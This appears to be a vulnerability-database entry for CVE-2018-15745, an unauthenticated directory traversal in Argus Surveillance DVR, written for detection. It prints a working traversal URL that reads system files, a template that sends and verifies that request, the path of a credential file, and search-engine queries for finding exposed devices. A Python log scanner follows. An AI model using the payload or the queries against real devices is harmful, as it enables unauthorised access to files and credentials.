CVE-2018-15745
published 2018-08-30

CVE-2018-15745: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE…

Priority: P273, high, 7.5 (CVSS 3.0)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
ITW, EXPLOIT: exploited in the wild
EPSS: 97.71% (99.9th percentile)
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.

Affected (1 range)

Vendor | Product | Version range | Fixed in
argussurveillance | dvr | |

Detection & IOCs (extracted from sources)

url: /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
port: 8080
path: C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
filename: WEBACCOUNT.CGI
command: ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini
sigma
id: CVE-2018-15745
info:
  name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
http:
  - method: GET
    path:
      - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
    # Both matchers must succeed for the request to count as a hit.
    matchers-condition: and
    matchers:
      # Body must contain both strings found in Windows\system.ini.
      - type: word
        part: body
        words:
          - "for 16-bit app support"
          - "[drivers]"
        condition: and
      - type: status
        status:
          - 200
  • Detect exploitation attempts by matching HTTP GET requests to /WEBACCOUNT.CGI that contain the traversal sequence ..%2F in the RESULTPAGE parameter, particularly on port 8080.
  • Alert on HTTP 200 responses to /WEBACCOUNT.CGI traversal requests whose body contains both 'for 16-bit app support' and '[drivers]', which confirms a successful read of Windows\system.ini.
  • Monitor for access to DVRParams.ini via directory traversal, as this file is a high-value target on Argus DVR systems and may expose additional credentials or vulnerabilities.
  • Use Shodan/FOFA queries to identify exposed Argus DVR instances: shodan-query 'http.title:"web viewer for samsung dvr"' and fofa-query 'title="web viewer for samsung dvr"'.
  • The vulnerability affects only Argus Surveillance DVR version 4.0.0.0 and the product has never received a patch, meaning all deployed instances remain vulnerable.
  • The traversal is unauthenticated: no credentials are required (WEBACCOUNTID and WEBACCOUNTPASSWORD are empty), so network-level access to port 8080 is sufficient for exploitation.
  • This is a Windows-based application; traversal payloads target Windows file paths (e.g., Windows\system.ini, C:\ProgramData\...) rather than Unix-style paths.
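
The log-side checks described in the notes above can be sketched as follows. This is an added example, not a rule from the sources this page quotes. It assumes Common Log Format lines from a proxy or sensor in front of the DVR; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed layout: Common Log Format lines from a proxy or sensor in front of the DVR.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value, max_rounds=5):
    """Percent-decode until stable so nested encodings are normalized before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resultpage_traversal(target):
    """Return the decoded RESULTPAGE value if it holds a '..' path segment, else None."""
    parts = urlsplit(target)
    if not parts.path.upper().endswith("/WEBACCOUNT.CGI"):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.upper() == "RESULTPAGE":
            decoded = decode_fully(value).replace("\\", "/")
            if ".." in decoded.split("/"):
                return decoded
    return None

def scan(lines):
    """Return one finding per log line whose RESULTPAGE value traverses directories."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        decoded = resultpage_traversal(m["target"]) if m else None
        if decoded is not None:
            findings.append({
                "ip": m["ip"],
                "resultpage": decoded,
                "served": m["status"] == "200",  # 200: answered; a body match confirms the read
                "dvrparams": decoded.lower().endswith("/dvrparams.ini"),
            })
    return findings

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1" 200 219',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /WEBACCOUNT.CGI?RESULTPAGE=..%2F..%2FProgramData%2FPY_Software%2FArgus%20Surveillance%20DVR%2FDVRParams.ini HTTP/1.1" 404 0',
    '192.0.2.20 - - [01/Jan/2024:10:01:00 +0000] "GET /WEBACCOUNT.CGI?RESULTPAGE=Index.html&USEREDIRECT=1 HTTP/1.1" 200 1024',
]
```

Calling scan(SAMPLE) returns two findings: the first was served with status 200, the second targets DVRParams.ini. The benign RESULTPAGE=Index.html request is not reported.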

CVSS provenance

nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N